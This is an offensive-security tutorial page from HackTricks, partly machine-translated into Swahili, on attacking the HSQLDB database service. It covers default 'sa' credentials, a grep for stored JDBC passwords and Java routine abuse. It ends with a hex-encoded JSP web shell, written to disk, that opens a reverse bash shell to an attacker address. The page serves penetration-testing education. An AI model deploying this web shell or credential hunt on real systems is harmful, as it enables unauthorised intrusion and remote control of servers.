hacktricks/network-services-pentesting/9001-pentesting-hsqldb.md

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Check the subscription plans!
• Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
• Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

Basic Information

HSQLDB (HyperSQL DataBase) ni mfumo mkuu wa hifadhidata ya SQL inayohusiana iliyoandikwa kwa Java. Inatoa injini ndogo, ya haraka ya hifadhidata yenye nyuzi nyingi na ya muamala yenye meza za ndani na za diski na inasaidia hali za embedded na server.

Default port: 9001

9001/tcp open  jdbc      HSQLDB JDBC (Network Compatibility Version 2.3.4.0)

Information

Default Settings

Kumbuka kwamba kwa default huduma hii inawezekana inafanya kazi katika kumbukumbu au imefungwa kwa localhost. Ikiwa umeipata, huenda umepata huduma nyingine na unatafuta kuongeza mamlaka.

Maalum ya default mara nyingi ni sa bila nenosiri.

Ikiwa umefanikiwa katika huduma nyingine, tafuta maelezo yanayowezekana kwa kutumia

grep -rP 'jdbc:hsqldb.*password.*' /path/to/search

Note the database name carefully - you’ll need it to connect.

Info Gathering

Connect to the DB instance by downloading HSQLDB and extracting hsqldb/lib/hsqldb.jar. Run the GUI app eww using java -jar hsqldb.jar and connect to the instance using the discovered/weak credentials.

Note the connection URL will look something like this for a remote system: jdbc:hsqldb:hsql://ip/DBNAME.

Tricks

Java Language Routines

We can call static methods of a Java class from HSQLDB using Java Language Routines. Do note that the called class needs to be in the application’s classpath.

JRTs can be functions or procedures. Functions can be called via SQL statements if the Java method returns one or more SQL-compatible primitive variables. They are invoked using the VALUES statement.

If the Java method we want to call returns void, we need to use a procedure invoked with the CALL statement.

Reading Java System Properties

Create function:

CREATE FUNCTION getsystemproperty(IN key VARCHAR) RETURNS VARCHAR LANGUAGE JAVA
DETERMINISTIC NO SQL
EXTERNAL NAME 'CLASSPATH:java.lang.System.getProperty'

Tekeleza kazi:

VALUES(getsystemproperty('user.name'))

You can find a list of system properties here.

Andika Maudhui kwenye Faili

You can use the com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename Java gadget located in the JDK auto loaded into the class path of the application to write hex-encoded items to disk via a custom procedure. Kumbuka ukubwa wa juu wa 1024 bytes.

Create procedure:

CREATE PROCEDURE writetofile(IN paramString VARCHAR, IN paramArrayOfByte VARBINARY(1024))
LANGUAGE JAVA DETERMINISTIC NO SQL EXTERNAL NAME
'CLASSPATH:com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename'

Tekeleza utaratibu:

call writetofile('/path/ROOT/shell.jsp', cast ('3c2540207061676520696d706f72743d226a6176612e696f2e2a2220253e0a3c250a202020537472696e6720636d64203d20222f62696e2f62617368202d69203e26202f6465762f7463702f3139322e3136382e3131392[...]' AS VARBINARY(1024)))

{% hint style="success" %} Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

{% endhint %}